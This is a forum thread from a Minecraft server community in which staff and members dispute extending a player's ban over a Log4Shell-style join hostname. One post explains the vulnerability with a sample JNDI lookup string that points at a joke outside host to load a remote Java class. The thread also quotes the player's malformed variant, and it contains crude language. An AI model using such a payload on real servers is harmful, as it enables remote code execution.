eva67x - Indef Ban Notification

Please Note: The TotalFreedom Forum has now been put into a read-only mode. Total Freedom has now closed down and will not be returning in any way, shape or form. It has been a pleasure to lead this community and I wish you all the best for your futures.
1st Official Post
    • Official Post

    Further to previous threads.

    Due to the attempt to exploit the Log4J exploit (All be it in a stupid way that could cause no damage) eva67x's existing Indef Ban is hereby extended to 6 months.

    UUID - 4d708f0c-cb2a-4a1e-928f-214daccc9d18

    Screenshot_2022-10-09_at_13.53.57.png

    Wild1145

    Network Owner at TotalFreedom

    Managing Director at ATLAS Media Group Ltd.

    Founder & Owner at MastodonApp.UK

    I would actually like to challenge this decision to extend the ban. I do not agree that this was actually an attempt to exploit Log4Shell, and I firmly believe this was intended to be a joke about a well-known exploit and not an actual attempt to cause any harm to the server whatsoever. Before I can explain my viewpoint, I'd like to clear some things up first.

    Note: Many of these are things that Eva likely already knows about because she has experience coding in Java, Minecraft (along with its protocols), and computers in general.

    How Log4Shell Worked

    Log4Shell abused a galaxy brain decision by the developers of Log4J where they thought it was a brilliant idea to allow people to query URLs as strings and then load whatever data that comes up as Java code. A typical payload would look something like this:

    Code
    ${jndi:ldap://johnson.cant-stop-dropping-sh.it/MyCockIsBiggerThanYours.class}

    In this example, a vulnerable server would then download whatever is at http://johnson.cant-stop-dropping-sh.it/MyCockIsBiggerThanYours.class and then load it into memory as native Java code. For the payload to work, you need to specify a link that contains either a valid domain or a valid numerical IP address (with all sets of numbers being a number from 0 to 255). Keep this in mind when reading the rest of this post.

    About domains

    Domains essentially route human-friendly text like totalfreedom.me to IP addresses. All public domains are required to have what's called a TLD (Top Level Domain) in order to work. While private domains do not have this restriction and can be things like "cockstapler", a vulnerable server needs to firstly be configured to know what the fuck "cockstapler" is, which cannot be done from the outside world without someone breaching whatever DNS server the network relies on.

    Why it wouldn't work

    Now that we've gotten the technical explanations out of the way, let's talk about why the string Ryan cites as an attempt to exploit Log4J wouldn't work. For reference, here's the string itself:

    Code
    ${jdni:ldap://get_balls}
    • The domain the string links to, "get_balls", is not a valid public domain name
      It lacks a Top Level Domain, and because an attacker would absolutely need to use a public domain (which would require one) to abuse the vulnerability, this flat out wouldn't work even if we were vulnerable to Log4Shell because the server wouldn't be able to reach whatever is at get_balls.
    • Nothing in our infrastructure at the time of the incident was even remotely affected by Log4Shell
      Log4Shell had been patched 4 months earlier by Log4J's development team, and Mojang (along with the developers of Paper, Fabric, Forge, etc) had quite literally pushed out an update for every version of Minecraft they supported to use the version of Log4J with the patch. By the time we updated Paper to 1.17, Paper had already pushed a patch for that particular version as well. In addition, BungeeCord (the proxy software we use that connects all of the servers together in the network) doesn't even use Log4J at all, so the proxy was basically immune to the exploit right from the get-go.
    • Nothing in our infrastructure at the time of the incident ever used Log4J to log the domain name/IP address used to join the network
      The only things that log that kind of information (namely, NetworkManager and Plan) do it in a way that do not use Log4J at all. They simply take whatever string was used, process it, and then send it to a database using some shit like MySQL. Besides, it would be incredibly pointless to log that kind of information to the server logs in the first place.

    Why I believe it's a joke

    Given the fact that the vulnerability had been patched 4 months prior to the incident and she used a string that linked to an invalid domain that was quite literally a balls joke (something she has made many many times before) and very obviously wouldn't work for the reasons above, I am inclined to believe she did not in fact attempt to exploit the vulnerability but rather was joking about the vulnerability itself. Why would she even attempt to abuse a vulnerability when she knows it would very obviously not work?

    image.png

    • Official Post

    The reality is they tried to push an exploit onto the server, they had no idea if it had been patched or not, and it could have caused major issues. The reality is this was one of the worse offenders of abusing this system, this is the full list of every invalid hostname they tried to join that I then had to clean up

    Quote from wild1145

    they tried to push an exploit onto the server

    You make it seem like she deliberately tried to exploit this vulnerability in order to compromise the server/network, even though it very clearly seems like she was joking about the exploit and genuinely didn't intend to do any harm.

    Quote from wild1145

    they had no idea if it had been patched or not

    How do you know this? Given how much time had passed since the exploit was disclosed and the true severity of the exploit, I think it would be common sense that it would have been patched by then.

    Quote from wild1145

    it could have caused major issues

    How? The URL isn't even valid, and nothing in our infrastructure uses Log4J to log that kind of information anyways. Minecraft doesn't log that kind of information when a player logs in, and BungeeCord doesn't even use Log4J as its logging library, so I highly doubt that any plugins would have been affected by it. Even if we were at all vulnerable to Log4Shell at the time, this wouldn't have done anything.

    image.png

    Quote from videogamesm12

    How do you know this?

    What eva has said multiple times, here in details:

    Quote from eva

    I connected with this address on the 12/13th of April 2022 (Same dates I was joining with made-up addresses) and the log4shell CVE was discovered and reported to Apache on the 24th of November 2021 and patched on the 9th of December 2021 (5 months before I connected with made-up addresses) which means that by this date it was patched and is no longer a CVE or exploit

    TotalFreedom's Executive Community & Marketing Manager

    • Official Post
    Quote from videogamesm12

    You make it seem like she deliberately tried to exploit this vulnerability in order to compromise the server/network, even though it very clearly seems like she was joking about the exploit and genuinely didn't intend to do any harm.

    But she did, if she didn't, she wouldn't have used a hostname that could (if the right set of circumstances were met) have caused issues to the network. If it was a "Joke" it sure as fuck wasn't a funny one.


    Quote from videogamesm12

    How do you know this? Given how much time had passed since the exploit was disclosed and the true severity of the exploit, I think it would be common sense that it would have been patched by then.

    Because our patch status isn't public knowledge, nor would she or most people have a full understanding of exactly what components that string could have been stored / rendered or processed through.


    Quote from videogamesm12

    How? The URL isn't even valid, and nothing in our infrastructure uses Log4J to log that kind of information anyways. Minecraft doesn't log that kind of information when a player logs in, and BungeeCord doesn't even use Log4J as its logging library, so I highly doubt that any plugins would have been affected by it. Even if we were at all vulnerable to Log4Shell at the time, this wouldn't have done anything.

    Most of our infrastructure did have a log4J component that could have been exploited, we had to put steps in place to ensure it couldn't be. The URL String could indeed have been valid / resolved to something again due to how Java operates and how some Java libraries will parse it for DNS resolution.

    The bottom line is when people attempt to exploit anything on the network, they're banned. Again, the reality is Eva was the 2nd most significant offender based on the number of unique strings they used to connect and number of connections made, it took a substantial amount of time to clean up compared to the one or two entries most other people had. I think it's fair to punish someone more significantly when they were more significantly disruptive.

    Wild1145

    Network Owner at TotalFreedom

    Managing Director at ATLAS Media Group Ltd.

    Founder & Owner at MastodonApp.UK

    Quote from wild1145

    But she did, if she didn't, she wouldn't have used a hostname that could (if the right set of circumstances were met) have caused issues to the network.

    But as noted below, it absolutely couldn't and Eva knows this for a fact. Also, what does "if the right set of circumstances were met" mean? That string would have only worked in that string if each of these spectacular blunders happened:

    • [Network-level] BungeeCord using Log4J at all for its logging (it simply doesn't)
    • Us running a version of Paper/Scissors that was still vulnerable to the exploit (we didn't because that would be fucking suicide)
    • Us for some reason deciding to actually manually resolve the domain get_balls to somewhere that hosted malicious class files (we don't, because that would be retarded) OR manually configure our shit to append .com to the end of domains that fail to resolve (we didn't and still don't, because that's absolutely pointless)
    • Us using something that uses Log4J specifically to log the IP address used by players to join the server (we don't)

    Classifying what Eva did as a deliberate attempt to harm the server requires you to prove that it would have actually worked in the default configuration for a Minecraft server, in our configuration, and in a reasonable configuration for a server like ours. In all 3 configurations, the string just simply could not work. I strongly believe she was only merely joking about the exploit itself given her knowledge on Java, its various libraries, and how they tick.

    Quote from wild1145

    Because our patch status isn't public knowledge

    Except it is public knowledge. Anyone can go to the GitHub repository for Paper (or in our case, Scissors) and compare the commit versions with what is on the server using /ver. Even then that doesn't even matter, because common sense takes place in the absence of public knowledge. Given the severity of Log4Shell where a single string could give you the keys to the mansion, it would be common sense for whoever was managing a vulnerable service to immediately patch the issue upon hearing about it. Eva, along with literally anyone else, would have assumed that we did the same thing already since it had been four months since that nuclear bomb of an exploit had dropped.

    Quote from wild1145

    nor would she or most people have a full understanding of exactly what components that string could have been stored / rendered or processed through.

    I disagree. I think she would understand it quite well. The exploit was a design flaw in the Log4J library itself and no other libraries actually had this issue. I can confidently say that nothing that gathered that kind of information would have been affected by this exploit at all.

    Quote from wild1145

    Most of our infrastructure did have a log4J component that could have been exploited, we had to put steps in place to ensure it couldn't be.

    Wait, what? Where, when, and how? I would have expected us to have discovered and patched this back in December of 2021.

    Quote from wild1145

    The URL String could indeed have been valid / resolved to something again due to how Java operates and how some Java libraries will parse it for DNS resolution.

    (Just to note, Ryan further detailed what he meant at the end with "due to how Java operates and how some Java libraries will parse it" in a set of Discord messages from October 20, 2022, which I've included below.)

    Quote from Wild1145, TF Discord

    FYI [...] in Java and a lot of other software if the DNS resolution fails it'll suffix .com to the hostname in the lookup. I know because I've triggered a lot of alarms on networks being monitored when we've had DNS leaks / misconfigured things.

    Quote from Wild1145, TF Discord

    So the reality is "${jndi:ldap://get_balls}" on the network would have resolved in a lot of cases to "${jndi:ldap://get_balls.com}"

    It wouldn't - I actually tested whether the domain "get_balls" would actually resolve to anywhere valid by deploying the string from the provided evidence to a local test server running a vulnerable version of Log4J. It attempted to resolve get_balls and obviously failed. However, it did not attempt to resolve any other domain, and this is evident by the fact that it didn't throw an error about a "get_balls.com" not resolving properly despite the fact that the domain doesn't exist. You can see the results below:

    ZCS5qRcT81XwwUOr.png

    Quote from wild1145

    The bottom line is when people attempt to exploit anything on the network, they're banned.

    When did I say I was challenging the initial ban? I was challenging your decision to extend Eva's ban from 2 months to 6 months because you backed said decision up by claiming she both maliciously and intentionally tried to abuse a critically dangerous remote code execution exploit with the idea being to disrupt the network or a server within it, which doesn't make sense given a wide variety of reasons which I have previously stated.

    Quote from wild1145

    Again, the reality is Eva was the 2nd most significant offender based on the number of unique strings they used to connect and number of connections made, it took a substantial amount of time to clean up compared to the one or two entries most other people had. I think it's fair to punish someone more significantly when they were more significantly disruptive.

    Actually, that would have actually been a much better justification than what you went with.

    image.png

    Quote from videogamesm12

    Actually, that would have actually been a much better justification than what you went with.

    fwiw this isn’t the first instance ryan said this like he’s been saying that from the start but just mainly on Discord

    my two cents is that we really need to start cutting down on the long term bans for regular users… to the point where it’s becoming an issue for the playercount. i’ve never been one to complain about shit like that cuz yk being an admin for 5 years I understand the need for bans and shit but when its extending a ban from 2 to 6 months for something that sure is bannable but not like critically serious, i start to question shit

    think of the knock on effect too.. if people start to worry everything is bannable then they wont join - especially since from eva’s pov it was just a joke gone wrong

    52-CEF3-CF-C4-FF-4798-8469-4-BDCA5-D35247.jpg